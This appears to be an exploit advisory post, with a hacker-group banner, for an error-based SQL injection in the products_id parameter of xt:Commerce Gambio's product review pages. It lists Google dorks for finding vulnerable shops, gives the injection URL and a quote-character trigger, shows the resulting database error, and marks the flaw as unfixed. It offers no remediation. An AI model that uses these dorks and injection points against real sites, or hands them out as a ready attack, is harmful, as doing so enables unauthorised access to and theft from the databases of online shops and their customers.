_____________________//_
/ ___/ _ \/ ___/ ___/ _ \/ __/(__)__//__///__//_
/____/\___/\___/_/ \___/\__/# Exploit Title: xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php"# Date: 2010-09-18# Author: secret# Contact : secret_hf@hotmail.com / ICQ : 17-33-77# Site : swissfaking.net/board# Software Link: http://www.gambio.de/# Version: 2006 - 2008 - 2010 - all versions# Tested on: XP / Linux# Fixed? : NOT FIXED# Dorks : Gambio inurl:"reviews.php" / Gambio inurl:"product_reviews.php?products_id=" etc...##############################################################################################[ERROR BASED SQL INJECTION]
http://www.xxxxx.com/product_reviews_info.php?products_id=x[SQL INJECTION]
e.g. http://server/product_reviews_info.php?products_id=4[ERROR BASED SQL INECTION]
e.g. http://server/product_reviews_info.php?products_id=4'
-> xtc_db_error ("select manufacturers_id from products where products_id = 4/'", "1064##############################################################################################[THANKS TO]
ALLAH - الله لا إله لا ايل
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION
